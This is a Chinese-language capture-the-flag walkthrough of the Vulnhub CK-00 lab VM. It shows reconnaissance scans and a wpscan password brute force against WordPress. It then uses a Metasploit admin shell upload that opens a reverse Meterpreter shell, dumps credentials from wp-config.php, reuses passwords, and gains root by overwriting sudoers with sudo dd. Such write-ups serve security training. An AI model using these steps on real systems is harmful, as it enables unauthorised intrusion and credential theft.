Vulnhub CK-00靶机解题过程
CK-00
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.66.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:ef:a8:59 1 60 PCS Systemtechnik GmbH
192.168.56.156 08:00:27:6a:4e:4d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.156
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 01:48 EST
Nmap scan report for bogon (192.168.56.156)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:6f:64:b5:4c:22:ce:b2:c9:8a:ab:57:0e:69:4a:0f (RSA)
| 256 a8:6f:9c:0e:d2:ee:f8:73:0a:0f:5f:57:1c:2f:59:3a (ECDSA)
|_ 256 10:8c:55:d4:79:7f:63:0f:ff:ea:c8:fb:73:1e:21:f6 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.2.2
|_http-title: CK~00 – Just another WordPress site
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:6A:4E:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.96 seconds
目标主机有两个开放端口22、80
Get Access
由于目标主机SSH服务版本较高,没有可利用的漏洞,接下来围绕着http服务展开:
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ gobuster dir -u http://192.168.56.156 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/07 01:51:52 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.156/wp-content/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.156/wp-admin/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.156/wp-includes/]
/server-status (Status: 403) [Size: 302]
Progress: 18376 / 56165 (32.72%)[ERROR] 2022/11/07 01:51:54 [!] parse "http://192.168.56.156/error\x1f_log": net/url: invalid control character in URL
Progress: 53961 / 56165 (96.08%)===============================================================
2022/11/07 01:51:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ dirb http://192.168.56.156
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 7 01:52:09 2022
URL_BASE: http://192.168.56.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.156/ ----
+ http://192.168.56.156/index.php (CODE:301|SIZE:0)
+ http://192.168.56.156/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.56.156/wp-admin/
==> DIRECTORY: http://192.168.56.156/wp-content/
==> DIRECTORY: http://192.168.56.156/wp-includes/
+ http://192.168.56.156/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.156/wp-admin/ ----
+ http://192.168.56.156/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-admin/css/
==> DIRECTORY: http://192.168.56.156/wp-admin/images/
==> DIRECTORY: http://192.168.56.156/wp-admin/includes/
+ http://192.168.56.156/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-admin/js/
==> DIRECTORY: http://192.168.56.156/wp-admin/maint/
==> DIRECTORY: http://192.168.56.156/wp-admin/network/
==> DIRECTORY: http://192.168.56.156/wp-admin/user/
---- Entering directory: http://192.168.56.156/wp-content/ ----
+ http://192.168.56.156/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-content/plugins/
==> DIRECTORY: http://192.168.56.156/wp-content/themes/
==> DIRECTORY: http://192.168.56.156/wp-content/uploads/
---- Entering directory: http://192.168.56.156/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.156/wp-admin/network/ ----
+ http://192.168.56.156/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.156/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.156/wp-admin/user/ ----
+ http://192.168.56.156/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.156/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.156/wp-content/plugins/ ----
+ http://192.168.56.156/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.156/wp-content/themes/ ----
+ http://192.168.56.156/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.156/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Nov 7 01:52:19 2022
DOWNLOADED: 32284 - FOUND: 12
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ nikto -h http://192.168.56.156
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.156
+ Target Hostname: 192.168.56.156
+ Target Port: 80
+ Start Time: 2022-11-07 01:52:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://ck/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2022-11-07 01:53:23 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ wpscan --url http://192.168.56.156 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.156/ [192.168.56.156]
[+] Started: Mon Nov 7 01:54:24 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.156/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.156/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.156/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.156/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.156/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.156/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Nov 7 01:54:26 2022
[+] Requests Done: 48
[+] Cached Requests: 4
[+] Data Sent: 11.116 KB
[+] Data Received: 70.663 KB
[+] Memory used: 203.141 MB
[+] Elapsed time: 00:00:02
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ wpscan --url http://192.168.56.156 -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.156/ [192.168.56.156]
[+] Started: Mon Nov 7 01:55:19 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.156/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.156/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.156/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.156/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.156/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.156/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin
Trying admin / alcala Time: 00:02:33 < > (19820 / 14364212) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Nov 7 01:57:56 2022
[+] Requests Done: 19961
[+] Cached Requests: 29
[+] Data Sent: 6.52 MB
[+] Data Received: 84.244 MB
[+] Memory used: 200.723 MB
[+] Elapsed time: 00:02:37
到目前为止识别出wordpress管理后台的用户名和密码: admin admin
访问wordpress后台,发现没有打开,从浏览器中的地址栏中的信息,需要修改/etc/hosts文件:
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.156 ck
接下来需要设法将php反向shell脚本上传至wordpress,先尝试第一种方法,登录后修改404模板,这样将php shell脚本代码替换4040模板
但是点击Update File后提示:Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
第二种方法,是在Media栏中上传shell脚本,但是也失败,即使更换了.php3, php5等扩展名。
需要想其他的办法:
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.156
RHOSTS => 192.168.56.156
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.137:5555
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/awGuajvmFu/ShZJGEZTFJ.php...
[*] Sending stage (39927 bytes) to 192.168.56.156
[+] Deleted ShZJGEZTFJ.php
[+] Deleted awGuajvmFu.php
[+] Deleted ../awGuajvmFu
[*] Meterpreter session 1 opened (192.168.56.137:5555 -> 192.168.56.156:55956) at 2022-11-07 02:19:31 -0500
成功拿到了Meterpreter shell
www-data@ck00:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ck_wp' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', 'bla_is_my_password' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'p#Q01YN<z$l{5^D&(haSU$vgD&b[p|)-Lur+Dg?~tatRgW>6gOVHVWx4w?oaucv.' );
define( 'SECURE_AUTH_KEY', '<2GT}7Pq7VO_ck.B,/Le0kGQ@4^2FmV`ZX`AXLy%zoUXJE=:E^OT6Z$*ATfmR^+i' );
define( 'LOGGED_IN_KEY', 'tZF#d=KgHwwDH;xRiY)H;zT>weOD4;JgWF7KR)E,I_Sh#-B~Vbt!ax#<f@CSpykY' );
define( 'NONCE_KEY', '8Odpqiy#/phCF6ezi?%gx0QEZWf ioBO,B}6h(TDkNBnrIjA`9.P6Jzn4+c<Z)D ' );
define( 'AUTH_SALT', 'kT0BrKy<fSR&[]HN]Pi{ +wa.@m~Xe)hGz2|LG#i*}v^upHn%B.^.swm q^rr%Bt' );
define( 'SECURE_AUTH_SALT', 'rV=Knc-+O}1Ee(v2T9P*{655sR-*aRW<NEc^lhd,IGBI<-0^=?cbq]#; |F||Ipi' );
define( 'LOGGED_IN_SALT', '|,(6szua!E2iatwI)AvtOZ5KehK}2p@Z]F.i%~!l>wu)(8pw;FV@qC&$?q,nmf0z' );
define( 'NONCE_SALT', 'tqAZj9,df7;4?DKrB5+$=4bwiQBO?Fs_tGYmN`Fc y?,r}90rh/aB;tzaCWwv4vi' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
www-data@ck00:/var/www/html$
www-data@ck00:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
ck-00:x:1000:1000:CyberKnight:/home/ck:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
bla1:x:1001:1001:Bla 1,01,0000,0001:/home/bla1:/bin/bash
bla:x:1002:1002:bla,0000,0000,0000:/home/bla:/bin/bash
www-data@ck00:/var/www/html$ su - bla
su - bla
Password: bla_is_my_password
bla@ck00:~$ id
id
uid=1002(bla) gid=1002(bla) groups=1002(bla)
bla@ck00:~$ sudo -l
sudo -l
[sudo] password for bla: bla_is_my_password
Matching Defaults entries for bla on ck00:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla may run the following commands on ck00:
(bla1) /usr/bin/scp
bla@ck00:~$ sudo -u bla1 /usr/bin/scp
sudo -u bla1 /usr/bin/scp
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
[-l limit] [-o ssh_option] [-P port] [-S program]
[[user@]host1:]file1 ... [[user@]host2:]file2
bla@ck00:~$
查看wp-config.php文件,看到了数据库用户名root, 密码:bla_is_my_password, 同时通过查看/etc/passwd文件,知道目标主机有bla用户名,因此猜测bla_is_my_password是用户bla的密码
sudo -l 后发现可以运行bla1的命令scp
因此猜测bla1的密码bla1_is_my_password
┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ ssh bla1@192.168.56.156
The authenticity of host '192.168.56.156 (192.168.56.156)' can't be established.
ED25519 key fingerprint is SHA256:S/Y0+W7GZ+wOi281WhP7Ra++AOCa3hRWjLJYofjlOeA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.156' (ED25519) to the list of known hosts.
bla1@192.168.56.156's password:
Permission denied, please try again.
bla1@192.168.56.156's password:
Last login: Fri Aug 2 13:23:25 2019 from 192.168.29.240
bla1@ck00:~$ id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck00:~$ sudo -l
Matching Defaults entries for bla1 on ck00:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla1 may run the following commands on ck00:
(ck-00) NOPASSWD: /bin/rbash
bla1@ck00:~$ sudo -u ck-00 /bin/rbash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
ck-00@ck00:~$ id
uid=1000(ck-00) gid=1000(ck-00) groups=1000(ck-00),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
ck-00@ck00:~$ ls
ck-00@ck00:~$ cd /home
rbash: cd: restricted
ck-00@ck00:~$ sudo -l
Matching Defaults entries for ck-00 on ck00:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck-00 may run the following commands on ck00:
(root) NOPASSWD: /bin/dd
ck-00@ck00:~$ echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
0+1 records in
0+1 records out
30 bytes copied, 0.000104292 s, 288 kB/s
ck-00@ck00:~$ sudo su
root@ck00:/home/bla1# id
uid=0(root) gid=0(root) groups=0(root)
root@ck00:/home/bla1# cd /root
root@ck00:~# ls
ck00-root-flag.txt
root@ck00:~# cat ck00-root-flag.txt
▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄
▐░░░░░░░░░░░▐░▌ ▐░▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌ ▐░▐░░▌ ▐░▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌ ▐░▐░░░░░░░░░░░▌ ▐░░░░░░░░░▌ ▐░░░░░░░░░▌
▐░█▀▀▀▀▀▀▀▀▀▐░▌ ▐░▐░█▀▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀▀▀▐░█▀▀▀▀▀▀▀█░▐░▌ ▐░▌▐░▌░▌ ▐░▌▀▀▀▀█░█▀▀▀▀▐░█▀▀▀▀▀▀▀▀▀▐░▌ ▐░▌▀▀▀▀█░█▀▀▀▀ ▐░█░█▀▀▀▀▀█░▐░█░█▀▀▀▀▀█░▌
▐░▌ ▐░▌ ▐░▐░▌ ▐░▐░▌ ▐░▌ ▐░▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▐░▌▐░▌ ▐░▌
▐░▌ ▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄▄▄▐░█▄▄▄▄▄▄▄█░▐░▌░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▐░█▄▄▄▄▄▄▄█░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌ ▐░▌
▐░▌ ▐░░░░░░░░░░░▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░░░░░░░░░░░▐░░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌ ▐░▌
▐░▌ ▀▀▀▀█░█▀▀▀▀▐░█▀▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀▀▀▐░█▀▀▀▀█░█▀▀▐░▌░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀▀▀▀▀▀█░▐░█▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌ ▐░▌
▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▐░▌ ▐░▌▐░▌
▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▐░█▄▄▄▄▄▄▄▄▄▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▐░▌▄▄▄▄█░█▄▄▄▄▐░█▄▄▄▄▄▄▄█░▐░▌ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄█░█░▐░█▄▄▄▄▄█░█░▌
